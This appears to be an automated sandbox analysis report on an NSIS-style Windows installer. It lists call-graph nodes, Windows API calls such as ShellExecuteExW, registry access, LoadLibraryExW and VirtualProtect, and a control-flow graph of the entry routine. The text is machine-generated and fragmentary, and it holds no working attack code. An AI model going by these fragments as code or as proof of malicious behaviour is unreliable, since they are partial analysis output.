5602 402c41 17 API calls 5601->5602 5603 40168b 5602->5603 5604 402c41 17 API calls 5603->5604 5605 401694 MoveFileW 5604->5605 5606 4016a0 5605->5606 5607 4016a7 5605->5607 5609 401423 24 API calls 5606->5609 5608 4065c7 2 API calls 5607->5608 5611 402250 5607->5611 5610 4016b6 5608->5610 5609->5611 5610->5611 5612 40604a 36 API calls 5610->5612 5612->5606 5613 401e7d 5614 402c41 17 API calls 5613->5614 5615 401e83 5614->5615 5616 402c41 17 API calls 5615->5616 5617 401e8c 5616->5617 5618 402c41 17 API calls 5617->5618 5619 401e95 5618->5619 5620 402c41 17 API calls 5619->5620 5621 401e9e 5620->5621 5622 401423 24 API calls 5621->5622 5623 401ea5 5622->5623 5630 4058b0 ShellExecuteExW 5623->5630 5625 401ee7 5627 40288b 5625->5627 5631 40670f WaitForSingleObject 5625->5631 5628 401f01 CloseHandle 5628->5627 5630->5625 5632 406729 5631->5632 5633 40673b GetExitCodeProcess 5632->5633 5634 40669a 2 API calls 5632->5634 5633->5628 5635 406730 WaitForSingleObject 5634->5635 5635->5632 5636 4019ff 5637 402c41 17 API calls 5636->5637 5638 401a06 5637->5638 5639 402c41 17 API calls 5638->5639 5640 401a0f 5639->5640 5641 401a16 lstrcmpiW 5640->5641 5642 401a28 lstrcmpW 5640->5642 5643 401a1c 5641->5643 5642->5643 5644 401000 5645 401037 BeginPaint GetClientRect 5644->5645 5646 40100c DefWindowProcW 5644->5646 5648 4010f3 5645->5648 5649 401179 5646->5649 5650 401073 CreateBrushIndirect FillRect DeleteObject 5648->5650 5651 4010fc 5648->5651 5650->5648 5652 401102 CreateFontIndirectW 5651->5652 5653 401167 EndPaint 5651->5653 5652->5653 5654 401112 6 API calls 5652->5654 5653->5649 5654->5653 5655 407081 5658 406812 5655->5658 5656 406893 GlobalFree 5657 40689c GlobalAlloc 5656->5657 5657->5658 5659 40717d 5657->5659 5658->5656 5658->5657 5658->5658 5658->5659 5660 406913 GlobalAlloc 5658->5660 5661 40690a GlobalFree 5658->5661 5660->5658 5660->5659 5661->5660 5662 401503 5663 40150b 5662->5663 5665 40151e 5662->5665 5664 402c1f 17 API calls 5663->5664 5664->5665 4550 402484 4561 402c81 4550->4561 4553 402c41 17 API calls 4554 402497 4553->4554 4555 4024a2 RegQueryValueExW 4554->4555 4560 40288b 4554->4560 4556 4024c8 RegCloseKey 4555->4556 4557 4024c2 4555->4557 4556->4560 4557->4556 4566 4061cb wsprintfW 4557->4566 4562 402c41 17 API calls 4561->4562 4563 402c98 4562->4563 4564 4060f1 RegOpenKeyExW 4563->4564 4565 40248e 4564->4565 4565->4553 4566->4556 5666 402104 5667 402c41 17 API calls 5666->5667 5668 40210b 5667->5668 5669 402c41 17 API calls 5668->5669 5670 402115 5669->5670 5671 402c41 17 API calls 5670->5671 5672 40211f 5671->5672 5673 402c41 17 API calls 5672->5673 5674 402129 5673->5674 5675 402c41 17 API calls 5674->5675 5677 402133 5675->5677 5676 402172 CoCreateInstance 5681 402191 5676->5681 5677->5676 5678 402c41 17 API calls 5677->5678 5678->5676 5679 401423 24 API calls 5680 402250 5679->5680 5681->5679 5681->5680 5682 401f06 5683 402c41 17 API calls 5682->5683 5684 401f0c 5683->5684 5685 4052ec 24 API calls 5684->5685 5686 401f16 5685->5686 5687 40586d 2 API calls 5686->5687 5688 401f1c 5687->5688 5689 401f3f CloseHandle 5688->5689 5691 40670f 5 API calls 5688->5691 5692 40288b 5688->5692 5689->5692 5693 401f31 5691->5693 5693->5689 5695 4061cb wsprintfW 5693->5695 5695->5689 5696 73cb2301 5697 73cb236b 5696->5697 5698 73cb2376 GlobalAlloc 5697->5698 5699 73cb2395 5697->5699 5698->5697 5700 73cb1000 5703 73cb101b 5700->5703 5704 73cb1516 GlobalFree 5703->5704 5705 73cb1020 5704->5705 5706 73cb1027 GlobalAlloc 5705->5706 5707 73cb1024 5705->5707 5706->5707 5708 73cb153d 3 API calls 5707->5708 5709 73cb1019 5708->5709 4655 40230c 4656 402314 4655->4656 4657 40231a 4655->4657 4658 402c41 17 API calls 4656->4658 4659 402c41 17 API calls 4657->4659 4660 402328 4657->4660 4658->4657 4659->4660 4662 402c41 17 API calls 4660->4662 4663 402336 4660->4663 4661 402c41 17 API calls 4664 40233f WritePrivateProfileStringW 4661->4664 4662->4663 4663->4661 5710 40190c 5711 401943 5710->5711 5712 402c41 17 API calls 5711->5712 5713 401948 5712->5713 5714 405996 67 API calls 5713->5714 5715 401951 5714->5715 5716 401f8c 5717 402c41 17 API calls 5716->5717 5718 401f93 5717->5718 5719 40665e 5 API calls 5718->5719 5720 401fa2 5719->5720 5721 401fbe GlobalAlloc 5720->5721 5723 402026 5720->5723 5722 401fd2 5721->5722 5721->5723 5724 40665e 5 API calls 5722->5724 5725 401fd9 5724->5725 5726 40665e 5 API calls 5725->5726 5727 401fe3 5726->5727 5727->5723 5731 4061cb wsprintfW 5727->5731 5729 402018 5732 4061cb wsprintfW 5729->5732 5731->5729 5732->5723 5733 40238e 5734 4023c1 5733->5734 5735 402396 5733->5735 5737 402c41 17 API calls 5734->5737 5736 402c81 17 API calls 5735->5736 5738 40239d 5736->5738 5739 4023c8 5737->5739 5741 402c41 17 API calls 5738->5741 5742 4023d5 5738->5742 5744 402cff 5739->5744 5743 4023ae RegDeleteValueW RegCloseKey 5741->5743 5743->5742 5745 402d13 5744->5745 5746 402d0c 5744->5746 5745->5746 5748 402d44 5745->5748 5746->5742 5749 4060f1 RegOpenKeyExW 5748->5749 5751 402d72 5749->5751 5750 402d98 RegEnumKeyW 5750->5751 5752 402daf RegCloseKey 5750->5752 5751->5750 5751->5752 5753 402dd0 RegCloseKey 5751->5753 5755 402d44 6 API calls 5751->5755 5758 402dc3 5751->5758 5754 40665e 5 API calls 5752->5754 5753->5758 5756 402dbf 5754->5756 5755->5751 5757 402de0 RegDeleteKeyW 5756->5757 5756->5758 5757->5758 5758->5746 5759 40698e 5760 406812 5759->5760 5761 40717d 5760->5761 5762 406893 GlobalFree 5760->5762 5763 40689c GlobalAlloc 5760->5763 5764 406913 GlobalAlloc 5760->5764 5765 40690a GlobalFree 5760->5765 5762->5763 5763->5760 5763->5761 5764->5760 5764->5761 5765->5764 5766 40190f 5767 402c41 17 API calls 5766->5767 5768 401916 5767->5768 5769 4058ea MessageBoxIndirectW 5768->5769 5770 40191f 5769->5770 5771 401491 5772 4052ec 24 API calls 5771->5772 5773 401498 5772->5773 5774 401d14 5775 402c1f 17 API calls 5774->5775 5776 401d1b 5775->5776 5777 402c1f 17 API calls 5776->5777 5778 401d27 GetDlgItem 5777->5778 5779 402592 5778->5779 5787 402598 5788 4025c7 5787->5788 5789 4025ac 5787->5789 5791 4025fb 5788->5791 5792 4025cc 5788->5792 5790 402c1f 17 API calls 5789->5790 5799 4025b3 5790->5799 5794 402c41 17 API calls 5791->5794 5793 402c41 17 API calls 5792->5793 5795 4025d3 WideCharToMultiByte lstrlenA 5793->5795 5796 402602 lstrlenW 5794->5796 5795->5799 5796->5799 5797 402645 5798 40262f 5798->5797 5800 405e2c WriteFile 5798->5800 5799->5797 5799->5798 5801 405e5b 5 API calls 5799->5801 5800->5797 5801->5798 5175 73cb2997 5176 73cb29e7 5175->5176 5177 73cb29a7 VirtualProtect 5175->5177 5177->5176 5802 40149e 5803 4022f7 5802->5803 5804 4014ac PostQuitMessage 5802->5804 5804->5803 5805 401c1f 5806 402c1f 17 API calls 5805->5806 5807 401c26 5806->5807 5808 402c1f 17 API calls 5807->5808 5809 401c33 5808->5809 5810 401c48 5809->5810 5811 402c41 17 API calls 5809->5811 5812 401c58 5810->5812 5813 402c41 17 API calls 5810->5813 5811->5810 5814 401c63 5812->5814 5815 401caf 5812->5815 5813->5812 5816 402c1f 17 API calls 5814->5816 5817 402c41 17 API calls 5815->5817 5818 401c68 5816->5818 5819 401cb4 5817->5819 5820 402c1f 17 API calls 5818->5820 5821 402c41 17 API calls 5819->5821 5822 401c74 5820->5822 5823 401cbd FindWindowExW 5821->5823 5824 401c81 SendMessageTimeoutW 5822->5824 5825 401c9f SendMessageW 5822->5825 5826 401cdf 5823->5826 5824->5826 5825->5826 5827 402aa0 SendMessageW 5828 402ac5 5827->5828 5829 402aba InvalidateRect 5827->5829 5829->5828 5830 402821 5831 402827 5830->5831 5832 402ac5 5831->5832 5833 40282f FindClose 5831->5833 5833->5832 4383 403d22 4384 403e75 4383->4384 4385 403d3a 4383->4385 4387 403ec6 4384->4387 4388 403e86 GetDlgItem GetDlgItem 4384->4388 4385->4384 4386 403d46 4385->4386 4389 403d51 SetWindowPos 4386->4389 4390 403d64 4386->4390 4392 403f20 4387->4392 4397 401389 2 API calls 4387->4397 4391 4041fb 18 API calls 4388->4391 4389->4390 4394 403d81 4390->4394 4395 403d69 ShowWindow 4390->4395 4396 403eb0 SetClassLongW 4391->4396 4445 403e70 4392->4445 4454 404247 4392->4454 4398 403da3 4394->4398 4399 403d89 DestroyWindow 4394->4399 4395->4394 4400 40140b 2 API calls 4396->4400 4401 403ef8 4397->4401 4402 403da8 SetWindowLongW 4398->4402 4403 403db9 4398->4403 4453 404184 4399->4453 4400->4387 4401->4392 4404 403efc SendMessageW 4401->4404 4402->4445 4407 403e62 4403->4407 4408 403dc5 GetDlgItem 4403->4408 4404->4445 4405 40140b 2 API calls 4443 403f32 4405->4443 4406 404186 DestroyWindow EndDialog 4406->4453 4476 404262 4407->4476 4409 403dd8 SendMessageW IsWindowEnabled 4408->4409 4412 403df5 4408->4412 4409->4412 4409->4445 4411 4041b5 ShowWindow 4411->4445 4414 403e02 4412->4414 4415 403e49 SendMessageW 4412->4415 4416 403e15 4412->4416 4425 403dfa 4412->4425 4413 4062a6 17 API calls 4413->4443 4414->4415 4414->4425 4415->4407 4418 403e32 4416->4418 4419 403e1d 4416->4419 4421 40140b 2 API calls 4418->4421 4470 40140b 4419->4470 4420 403e30 4420->4407 4424 403e39 4421->4424 4422 4041fb 18 API calls 4422->4443 4424->4407 4424->4425 4473 4041d4 4425->4473 4427 403fad GetDlgItem 4428 403fc2 4427->4428 4429 403fca ShowWindow KiUserCallbackDispatcher 4427->4429 4428->4429 4460 40421d KiUserCallbackDispatcher 4429->4460 4431 403ff4 EnableWindow 4436 404008 4431->4436 4432 40400d GetSystemMenu EnableMenuItem SendMessageW 4433 40403d SendMessageW 4432->4433 4432->4436 4433->4436 4436->4432 4461 404230 SendMessageW 4436->4461 4462 403d03 4436->4462 4465 406284 lstrcpynW 4436->4465 4438 40406c lstrlenW 4439 4062a6 17 API calls 4438->4439 4440 404082 SetWindowTextW 4439->4440 4466 401389 4440->4466 4442 4040c6 DestroyWindow 4444 4040e0 CreateDialogParamW 4442->4444 4442->4453 4443->4405 4443->4406 4443->4413 4443->4422 4443->4442 4443->4445 4457 4041fb 4443->4457 4446 404113 4444->4446 4444->4453 4447 4041fb 18 API calls 4446->4447 4448 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4447->4448 4449 401389 2 API calls 4448->4449 4450 404164 4449->4450 4450->4445 4451 40416c ShowWindow 4450->4451 4452 404247 SendMessageW 4451->4452 4452->4453 4453->4411 4453->4445 4455 404250 SendMessageW 4454->4455 4456 40425f 4454->4456 4455->4456 4456->4443 4458 4062a6 17 API calls 4457->4458 4459 404206 SetDlgItemTextW 4458->4459 4459->4427 4460->4431 4461->4436 4463 4062a6 17 API calls 4462->4463 4464 403d11 SetWindowTextW 4463->4464 4464->4436 4465->4438 4467 401390 4466->4467 4468 4013fe 4467->4468 4469 4013cb MulDiv SendMessageW 4467->4469 4468->4443 4469->4467 4471 401389 2 API calls 4470->4471 4472 401420 4471->4472 4472->4425 4474 4041e1 SendMessageW 4473->4474 4475 4041db 4473->4475 4474->4420 4475->4474 4477 404325 4476->4477 4478 40427a GetWindowLongW 4476->4478 4477->4445 4478->4477 4479 40428f 4478->4479 4479->4477 4480 4042bc GetSysColor 4479->4480 4481 4042bf 4479->4481 4480->4481 4482 4042c5 SetTextColor 4481->4482 4483 4042cf SetBkMode 4481->4483 4482->4483 4484 4042e7 GetSysColor 4483->4484 4485 4042ed 4483->4485 4484->4485 4486 4042f4 SetBkColor 4485->4486 4487 4042fe 4485->4487 4486->4487 4487->4477 4488 404311 DeleteObject 4487->4488 4489 404318 CreateBrushIndirect 4487->4489 4488->4489 4489->4477 5834 4015a3 5835 402c41 17 API calls 5834->5835 5836 4015aa SetFileAttributesW 5835->5836 5837 4015bc 5836->5837 5838 4046a5 5839 4046b5 5838->5839 5840 4046db 5838->5840 5842 4041fb 18 API calls 5839->5842 5841 404262 8 API calls 5840->5841 5843 4046e7 5841->5843 5844 4046c2 SetDlgItemTextW 5842->5844 5844->5840 5845 4029a8 5846 402c1f 17 API calls 5845->5846 5847 4029ae 5846->5847 5848 4029d5 5847->5848 5849 4029ee 5847->5849 5855 40288b 5847->5855 5852 4029da 5848->5852 5853 4029eb 5848->5853 5850 402a08 5849->5850 5851 4029f8 5849->5851 5856 4062a6 17 API calls 5850->5856 5854 402c1f 17 API calls 5851->5854 5859 406284 lstrcpynW 5852->5859 5853->5855 5860 4061cb wsprintfW 5853->5860 5854->5853 5856->5853 5859->5855 5860->5855 4599 40542b 4600 4055d5 4599->4600 4601 40544c GetDlgItem GetDlgItem GetDlgItem 4599->4601 4603 405606 4600->4603 4604 4055de GetDlgItem CreateThread CloseHandle 4600->4604 4645 404230 SendMessageW 4601->4645 4606 405631 4603->4606 4609 405656 4603->4609 4610 40561d ShowWindow ShowWindow 4603->4610 4604->4603 4648 4053bf OleInitialize 4604->4648 4605 4054bc 4614 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4605->4614 4607 405691 4606->4607 4608 40563d 4606->4608 4607->4609 4621 40569f SendMessageW 4607->4621 4611 405645 4608->4611 4612 40566b ShowWindow 4608->4612 4613 404262 8 API calls 4609->4613 4647 404230 SendMessageW 4610->4647 4616 4041d4 SendMessageW 4611->4616 4617 40568b 4612->4617 4618 40567d 4612->4618 4626 405664 4613->4626 4619 405531 4614->4619 4620 405515 SendMessageW SendMessageW 4614->4620 4616->4609 4623 4041d4 SendMessageW 4617->4623 4622 4052ec 24 API calls 4618->4622 4624 405544 4619->4624 4625 405536 SendMessageW 4619->4625 4620->4619 4621->4626 4627 4056b8 CreatePopupMenu 4621->4627 4622->4617 4623->4607 4628 4041fb 18 API calls 4624->4628 4625->4624 4629 4062a6 17 API calls 4627->4629 4631 405554 4628->4631 4630 4056c8 AppendMenuW 4629->4630 4632 4056e5 GetWindowRect 4630->4632 4633 4056f8 TrackPopupMenu 4630->4633 4634 405591 GetDlgItem SendMessageW 4631->4634 4635 40555d ShowWindow 4631->4635 4632->4633 4633->4626 4636 405713 4633->4636 4634->4626 4639 4055b8 SendMessageW SendMessageW 4634->4639 4637 405580 4635->4637 4638 405573 ShowWindow 4635->4638 4640 40572f SendMessageW 4636->4640 4646 404230 SendMessageW 4637->4646 4638->4637 4639->4626 4640->4640 4641 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4640->4641 4643 405771 SendMessageW 4641->4643 4643->4643 4644 40579a GlobalUnlock SetClipboardData CloseClipboard 4643->4644 4644->4626 4645->4605 4646->4634 4647->4606 4649 404247 SendMessageW 4648->4649 4650 4053e2 4649->4650 4653 401389 2 API calls 4650->4653 4654 405409 4650->4654 4651 404247 SendMessageW 4652 40541b OleUninitialize 4651->4652 4653->4650 4654->4651 5868 4028ad 5869 402c41 17 API calls 5868->5869 5871 4028bb 5869->5871 5870 4028d1 5873 405d55 2 API calls 5870->5873 5871->5870 5872 402c41 17 API calls 5871->5872 5872->5870 5874 4028d7 5873->5874 5896 405d7a GetFileAttributesW CreateFileW 5874->5896 5876 4028e4 5877 4028f0 GlobalAlloc 5876->5877 5878 402987 5876->5878 5879 402909 5877->5879 5880 40297e CloseHandle 5877->5880 5881 4029a2 5878->5881 5882 40298f DeleteFileW 5878->5882 5897 403311 SetFilePointer 5879->5897 5880->5878 5882->5881 5884 40290f 5885 4032fb ReadFile 5884->5885 5886 402918 GlobalAlloc 5885->5886 5887 402928 5886->5887 5888 40295c 5886->5888 5889 403116 35 API calls 5887->5889 5890 405e2c WriteFile 5888->5890 5895 402935 5889->5895 5891 402968 GlobalFree 5890->5891 5892 403116 35 API calls 5891->5892 5893 40297b 5892->5893 5893->5880 5894 402953 GlobalFree 5894->5888 5895->5894 5896->5876 5897->5884 5898 401a30 5899 402c41 17 API calls 5898->5899 5900 401a39 ExpandEnvironmentStringsW 5899->5900 5901 401a4d 5900->5901 5903 401a60 5900->5903 5902 401a52 lstrcmpW 5901->5902 5901->5903 5902->5903 5904 404331 lstrcpynW lstrlenW 4720 402032 4721 402044 4720->4721 4722 4020f6 4720->4722 4723 402c41 17 API calls 4721->4723 4725 401423 24 API calls 4722->4725 4724 40204b 4723->4724 4726 402c41 17 API calls 4724->4726 4731 402250 4725->4731 4727 402054 4726->4727 4728 40206a LoadLibraryExW 4727->4728 4729 40205c GetModuleHandleW 4727->4729 4728->4722 4730 40207b 4728->4730 4729->4728 4729->4730 4743 4066cd WideCharToMultiByte 4730->4743 4734 4020c5 4738 4052ec 24 API calls 4734->4738 4735 40208c 4736 402094 4735->4736 4737 4020ab 4735->4737 4739 401423 24 API calls 4736->4739 4746 73cb177b 4737->4746 4740 40209c 4738->4740 4739->4740 4740->4731 4741 4020e8 FreeLibrary 4740->4741 4741->4731 4744 4066f7 GetProcAddress 4743->4744 4745 402086 4743->4745 4744->4745 4745->4734 4745->4735 4747 73cb17ae 4746->4747 4788 73cb1b63 4747->4788 4749 73cb17b5 4750 73cb18da 4749->4750 4751 73cb17cd 4749->4751 4752 73cb17c6 4749->4752 4750->4740 4820 73cb2398 4751->4820 4836 73cb2356 4752->4836 4757 73cb1813 4849 73cb256d 4757->4849 4758 73cb1831 4761 73cb1882 4758->4761 4762 73cb1837 4758->4762 4759 73cb17fc 4771 73cb17f2 4759->4771 4846 73cb2d2f 4759->4846 4760 73cb17e3 4764 73cb17e9 4760->4764 4770 73cb17f4 4760->4770 4768 73cb256d 10 API calls 4761->4768 4868 73cb15c6 4762->4868 4764->4771 4830 73cb2a74 4764->4830 4774 73cb1873 4768->4774 4769 73cb1819 4860 73cb15b4 4769->4860 4840 73cb2728 4770->4840 4771->4757 4771->4758 4780 73cb18c9 4774->4780 4875 73cb2530 4774->4875 4777 73cb17fa 4777->4771 4778 73cb256d 10 API calls 4778->4774 4780->4750 4782 73cb18d3 GlobalFree 4780->4782 4782->4750 4785 73cb18b5 4785->4780 4879 73cb153d wsprintfW 4785->4879 4786 73cb18ae FreeLibrary 4786->4785 4882 73cb121b GlobalAlloc 4788->4882 4790 73cb1b87 4883 73cb121b GlobalAlloc 4790->4883 4792 73cb1dad GlobalFree GlobalFree GlobalFree 4793 73cb1dca 4792->4793 4808 73cb1e14 4792->4808 4795 73cb2196 4793->4795 4802 73cb1ddf 4793->4802 4793->4808 4794 73cb1c68 GlobalAlloc 4813 73cb1b92 4794->4813 4796 73cb21b8 GetModuleHandleW 4795->4796 4795->4808 4799 73cb21c9 LoadLibraryW 4796->4799 4800 73cb21de 4796->4800 4797 73cb1cb3 lstrcpyW 4801 73cb1cbd lstrcpyW 4797->4801 4798 73cb1cd1 GlobalFree 4798->4813 4799->4800 4799->4808 4890 73cb1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4800->4890 4801->4813 4802->4808 4886 73cb122c 4802->4886 4804 73cb2230 4807 73cb223d lstrlenW 4804->4807 4804->4808 4806 73cb2068 4889 73cb121b GlobalAlloc 4806->4889 4891 73cb1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4807->4891 4808->4749 4809 73cb21f0 4809->4804 4818 73cb221a GetProcAddress 4809->4818 4810 73cb20f0 4810->4808 4815 73cb2138 lstrcpyW 4810->4815 4813->4792 4813->4794 4813->4797 4813->4798 4813->4801 4813->4806 4813->4808 4813->4810 4814 73cb1fa9 GlobalFree 4813->4814 4816 73cb122c 2 API calls 4813->4816 4884 73cb158f GlobalSize GlobalAlloc 4813->4884 4814->4813 4815->4808 4816->4813 4818->4804 4819 73cb2071 4819->4749 4826 73cb23b0 4820->4826 4822 73cb24d9 GlobalFree 4823 73cb17d3 4822->4823 4822->4826 4823->4759 4823->4760 4823->4771 4824 73cb2458 GlobalAlloc WideCharToMultiByte 4824->4822 4825 73cb2483 GlobalAlloc 4828 73cb249a 4825->4828 4826->4822 4826->4824 4826->4825 4827 73cb122c GlobalAlloc lstrcpynW 4826->4827 4826->4828 4893 73cb12ba 4826->4893 4827->4826 4828->4822 4897 73cb26bc 4828->4897 4833 73cb2a86 4830->4833 4831 73cb2b2b CreateFileA 4832 73cb2b49 4831->4832 4834 73cb2c3a GetLastError 4832->4834 4835 73cb2c45 4832->4835 4833->4831 4834->4835 4835->4771 4837 73cb236b 4836->4837 4838 73cb2376 GlobalAlloc 4837->4838 4839 73cb17cc 4837->4839 4838->4837 4839->4751 4844 73cb2758 4840->4844 4841 73cb27f3 GlobalAlloc 4845 73cb2816 4841->4845 4842 73cb2806 4843 73cb280c GlobalSize 4842->4843 4842->4845 4843->4845 4844->4841 4844->4842 4845->4777 4847 73cb2d3a 4846->4847 4848 73cb2d7a GlobalFree 4847->4848 4900 73cb121b GlobalAlloc 4849->4900 4851 73cb2623 lstrcpynW 4858 73cb2577 4851->4858 4852 73cb2612 StringFromGUID2 4852->4858 4853 73cb25f0 MultiByteToWideChar 4853->4858 4854 73cb2636 wsprintfW 4854->4858 4855 73cb265a GlobalFree 4855->4858 4856 73cb268f GlobalFree 4856->4769 4857 73cb1272 2 API calls 4857->4858 4858->4851 4858->4852 4858->4853 4858->4854 4858->4855 4858->4856 4858->4857 4901 73cb12e1 4858->4901 4905 73cb121b GlobalAlloc 4860->4905 4862 73cb15b9 4863 73cb15c6 2 API calls 4862->4863 4864 73cb15c3 4863->4864 4865 73cb1272 4864->4865 4866 73cb127b GlobalAlloc lstrcpynW 4865->4866 4867 73cb12b5 GlobalFree 4865->4867 4866->4867 4867->4774 4869 73cb15e4 4868->4869 4870 73cb15d6 lstrcpyW 4868->4870 4869->4870 4871 73cb15f0 4869->4871 4873 73cb161d 4870->4873 4871->4873 4874 73cb160d wsprintfW 4871->4874 4873->4778 4874->4873 4876 73cb253e 4875->4876 4878 73cb1895 4875->4878 4877 73cb255a GlobalFree 4876->4877 4876->4878 4877->4876 4878->4785 4878->4786 4880 73cb1272 2 API calls 4879->4880 4881 73cb155e 4880->4881 4881->4780 4882->4790 4883->4813 4885 73cb15ad 4884->4885 4885->4813 4892 73cb121b GlobalAlloc 4886->4892 4888 73cb123b lstrcpynW 4888->4808 4889->4819 4890->4809 4891->4808 4892->4888 4894 73cb12c1 4893->4894 4895 73cb122c 2 API calls 4894->4895 4896 73cb12df 4895->4896 4896->4826 4898 73cb26ca VirtualAlloc 4897->4898 4899 73cb2720 4897->4899 4898->4899 4899->4828 4900->4858 4902 73cb12ea 4901->4902 4903 73cb130c 4901->4903 4902->4903 4904 73cb12f0 lstrcpyW 4902->4904 4903->4858 4904->4903 4905->4862 5905 403932 5906 40393d 5905->5906 5907 403941 5906->5907 5908 403944 GlobalAlloc 5906->5908 5908->5907 5914 402a35 5915 402c1f 17 API calls 5914->5915 5916 402a3b 5915->5916 5917 402a72 5916->5917 5918 40288b 5916->5918 5920 402a4d 5916->5920 5917->5918 5919 4062a6 17 API calls 5917->5919 5919->5918 5920->5918 5922 4061cb wsprintfW 5920->5922 5922->5918 5923 401735 5924 402c41 17 API calls 5923->5924 5925 40173c SearchPathW 5924->5925 5926 4029e6 5925->5926 5927 401757 5925->5927 5927->5926 5929 406284 lstrcpynW 5927->5929 5929->5926 5930 73cb103d 5931 73cb101b 5 API calls 5930->5931 5932 73cb1056 5931->5932 5933 4014b8 5934 4014be 5933->5934 5935 401389 2 API calls 5934->5935 5936 4014c6 5935->5936 5937 401db9 GetDC 5938 402c1f 17 API calls 5937->5938 5939 401dcb GetDeviceCaps MulDiv ReleaseDC 5938->5939 5940 402c1f 17 API calls 5939->5940 5941 401dfc 5940->5941 5942 4062a6 17 API calls 5941->5942 5943 401e39 CreateFontIndirectW 5942->5943 5944 402592 5943->5944 5945 4043ba 5946 4043d2 5945->5946 5947 4044ec 5945->5947 5950 4041fb 18 API calls 5946->5950 5948 404556 5947->5948 5951 404620 5947->5951 5954 404527 GetDlgItem SendMessageW 5947->5954 5949 404560 GetDlgItem 5948->5949 5948->5951 5952 4045e1 5949->5952 5953 40457a 5949->5953 5955 404439 5950->5955 5956 404262 8 API calls 5951->5956 5952->5951 5961 4045f3 5952->5961 5953->5952 5960 4045a0 SendMessageW LoadCursorW SetCursor 5953->5960 5978 40421d KiUserCallbackDispatcher 5954->5978 5958 4041fb 18 API calls 5955->5958 5959 40461b 5956->5959 5963 404446 CheckDlgButton 5958->5963 5979 404669 5960->5979 5965 404609 5961->5965 5966 4045f9 SendMessageW 5961->5966 5962 404551 5968 404645 SendMessageW 5962->5968 5976 40421d KiUserCallbackDispatcher 5963->5976 5965->5959 5967 40460f SendMessageW 5965->5967 5966->5965 5967->5959 5968->5948 5971 404464 GetDlgItem 5977 404230 SendMessageW 5971->5977 5973 40447a SendMessageW 5974 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5973->5974 5975 404497 GetSysColor 5973->5975 5974->5959 5975->5974 5976->5971 5977->5973 5978->5962 5982 4058b0 ShellExecuteExW 5979->5982 5981 4045cf LoadCursorW SetCursor 5981->5952 5982->5981 5983 40283b 5984 402843 5983->5984 5985 402847 FindNextFileW 5984->5985 5986 402859 5984->5986 5985->5986 5988 4029e6 5986->5988 5989 406284 lstrcpynW 5986->5989 5989->5988

                                                Executed Functions

                                                Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 8 4033a2 1->8 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 8->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 22 4033ea 17->22 22->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 31 403482-403487 28->31 32 403489-40348d 28->32 36 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->36 37 4035fd-403617 DeleteFileW call 402edd 29->37 31->31 31->32 34 403494-403498 32->34 35 40348f-403493 32->35 38 403557-403564 call 405b86 34->38 39 40349e-4034a4 34->39 35->34 36->37 54 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 36->54 57 4036c8-4036d8 call 40389a OleUninitialize 37->57 58 40361d-403623 37->58 55 403566-403567 38->55 56 403568-40356e 38->56 43 4034a6-4034ae 39->43 44 4034bf-4034f8 39->44 50 4034b0-4034b3 43->50 51 4034b5 43->51 45 403515-40354f 44->45 46 4034fa-4034ff 44->46 45->38 53 403551-403555 45->53 46->45 52 403501-403509 46->52 50->44 50->51 51->44 60 403510 52->60 61 40350b-40350e 52->61 53->38 62 403576-403584 call 406284 53->62 54->37 54->57 55->56 56->28 64 403574 56->64 73 4037fe-403804 57->73 74 4036de-4036ee call 4058ea ExitProcess 57->74 65 4036b8-4036bf call 403974 58->65 66 403629-403634 call 405b86 58->66 60->45 61->45 61->60 69 403589 62->69 64->69 76 4036c4 65->76 80 403682-40368c 66->80 81 403636-40366b 66->81 69->29 78 403882-40388a 73->78 79 403806-40381c GetCurrentProcess OpenProcessToken 73->79 76->57 83 403890-403894 ExitProcess 78->83 84 40388c 78->84 88 403852-403860 call 40665e 79->88 89 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 79->89 86 4036f4-403708 call 405855 lstrcatW 80->86 87 40368e-40369c call 405c61 80->87 82 40366d-403671 81->82 90 403673-403678 82->90 91 40367a-40367e 82->91 84->83 100 403715-40372f lstrcatW lstrcmpiW 86->100 101 40370a-403710 lstrcatW 86->101 87->57 99 40369e-4036b4 call 406284 * 2 87->99 102 403862-40386c 88->102 103 40386e-403879 ExitWindowsEx 88->103 89->88 90->91 95 403680 90->95 91->82 91->95 95->80 99->65 100->57 106 403731-403734 100->106 101->100 102->103 104 40387b-40387d call 40140b 102->104 103->78 103->104 104->78 109 403736-40373b call 4057bb 106->109 110 40373d call 405838 106->110 115 403742-403750 SetCurrentDirectoryW 109->115 110->115 118 403752-403758 call 406284 115->118 119 40375d-403786 call 406284 115->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 128 4037f2-4037f9 call 40604a 126->128 127->126 129 4037bb-4037db call 40604a call 4062a6 call 40586d 127->129 128->57 129->126 138 4037dd-4037e4 CloseHandle 129->138 138->126
                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 0040337C
                                                • GetVersion.KERNEL32 ref: 00403382
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                • OleInitialize.OLE32(00000000), ref: 004033F9
                                                • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
